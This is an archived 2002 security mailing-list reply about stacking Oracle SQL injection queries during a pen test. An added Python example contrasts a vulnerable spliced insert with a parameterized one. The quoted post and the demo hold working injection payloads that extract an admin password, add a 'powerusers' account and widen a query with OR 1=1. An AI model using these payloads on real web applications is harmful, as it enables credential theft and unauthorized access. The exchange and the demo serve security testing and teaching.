Re: SQL Injection

From: Chris Humphries (chumphries@devis.com)
Date: 06/11/02


Date: Tue, 11 Jun 2002 15:32:14 -0500
From: Chris Humphries <chumphries@devis.com>
To: Qyves <zqyves@netscape.net>

Try URL encoding the entire string. Also note that ; is a
"reserved" part of URL syntax, like ? and &.

Also, if it is Java, it may be using an ODBC driver to connect to
Oracle, and that may not allow for that anywho.

just some ideas...

=On Tue, Jun 11, 2002 at 04:30:48AM -0400,
=received 2.7K bytes from Qyves containing this:
> Hello all,
>
> Last time this was denied on pen-test due to cross-posting issues.
>
> I am currently pen-testing a web app and I am stuck in trying to execute two queries sequentially in Oracle.
>
> To my knowledge I can do this in SQL by separating the two queries with ; however, this is not happening in my case, in two circumstances...
>
> Here goes the history:
>
> Case1:
>
> I have discovered an injectable SQL query that is fed its data from a web form, the end query built by a cgi-script being
> something along those lines:
>
> (insert into tab_nam values ('a','b','c','d','e')); - a-e values from the web form - with me being able to inject, through
> concatenation and subqueries between any of those fields, a SELECT query.
>
> e.g.
> e='||select password from users where username='adm'||'
> query=(insert into tab_nam values ('a','b','c','d',''||select password from users where username='adm'||''));
>
> I tried an INSERT to no avail, fair enough since I don't think that INSERTs are allowed in nested queries... (or are they??)
>
> The last characters added by the cgi script are the ));
>
> e.g.
> e=aa')); (insert into powerusers values ('test', 'pwd
> ^^-- This gets around the NULL value insertion problem
> query=(insert into tab_nam values ('a','b','c','d','aa')); (insert into powerusers values ('test', 'pwd'));
>
> Those two queries should be executed sequentially but Oracle complains with an Invalid character error
>
> Case 2:
>
> I have also found a second query I can insert into, and parts of it are actually shown raw in the URL as an input to a servlet
> script, e.g. /stupid.cgi?A=123%20AND%20%ID=101
>
> This query appears to be something in the form of:
> SELECT foo from bar where [URL] ;
>
> I can inject an OR 1=1 in the above URL and get all the rows... However, when I try the sequential queries again I fail
> miserably. url=/stupid.cgi?A=123%20AND%20%ID=101%20OR%201=1
>
> original url=/stupidservlet?A=123%20AND%20%ID=101
> modified url=/stupidservlet?A=123%20AND%20%ID=101; insert into powerusers values ('test', 'pwd)
>
> I have full control over the url however I get just a "Server Error" back.
>
> Any clues on how to make any of these methods work anyone??
>
> Thanks in advance.
>
> Qyves

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
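The Case 1 insert from the quoted post, as an added example that is not code from either poster or from the list: it shows why splicing form values into the SQL text lets field e change the statement, how binding the same values as parameters stores the payload as a plain literal, and why a single-statement driver call rejects the `;`-stacked form outright. The schema, the 'adm' password value and the parenthesised subquery payload are constructed for illustration, and sqlite3 stands in for Oracle because it ships with Python.

```python
import sqlite3

# Constructed stand-in for the Oracle tables in the post. sqlite3 is used
# only because it ships with Python; the '||' concatenation and scalar
# subquery syntax that the injection relies on are the same in both.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
CREATE TABLE tab_nam (a TEXT, b TEXT, c TEXT, d TEXT, e TEXT);
INSERT INTO users VALUES ('adm', 'constructed-secret');
"""

# Constructed payload for field e, the parenthesised form of the one in
# the post: it closes the literal, concatenates a subquery, reopens it.
PAYLOAD = "'||(select password from users where username='adm')||'"

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def insert_vulnerable(conn, fields):
    # Mirrors the cgi-script from Case 1: form values are spliced into the
    # SQL text, so a value can change the structure of the statement.
    sql = "INSERT INTO tab_nam VALUES ('" + "','".join(fields) + "')"
    conn.execute(sql)
    return conn.execute("SELECT e FROM tab_nam").fetchone()[0]

def insert_parameterized(conn, fields):
    # Hardened form: each value is bound by the driver as data, so the same
    # payload is stored as a literal string and never parsed as SQL.
    conn.execute("INSERT INTO tab_nam VALUES (?,?,?,?,?)", tuple(fields))
    return conn.execute("SELECT e FROM tab_nam").fetchone()[0]

def stacked_statement_rejected(conn):
    # The post's second attempt appends a ';' and a second INSERT. A
    # single-statement execute() refuses the text outright, the same class
    # of failure as the Oracle "invalid character" error described above.
    try:
        conn.execute("SELECT a FROM tab_nam; "
                     "INSERT INTO tab_nam VALUES ('x','x','x','x','x')")
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return True
    return False

if __name__ == "__main__":
    print(insert_vulnerable(fresh_db(), ["a", "b", "c", "d", PAYLOAD]))
    print(insert_parameterized(fresh_db(), ["a", "b", "c", "d", PAYLOAD]))
    print(stacked_statement_rejected(fresh_db()))
```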
